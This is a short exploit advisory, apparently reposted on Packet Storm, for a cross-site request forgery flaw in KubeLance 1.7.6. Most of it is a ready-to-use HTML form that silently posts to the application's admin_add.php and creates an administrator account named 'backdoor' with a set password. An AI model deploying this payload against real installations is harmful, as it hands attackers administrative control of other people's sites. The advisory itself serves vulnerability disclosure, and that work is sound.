KubeLance version 1.7.6 suffers from a cross site request forgery vulnerability.
f7181d251941f62e5919135ca2f9decc52dfceca2e229b6af3bc07a4242f1298[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]
KubeLance script lack of cross site request forgery protection, allowing us
to make exploit and
add new admin user.
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#]EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed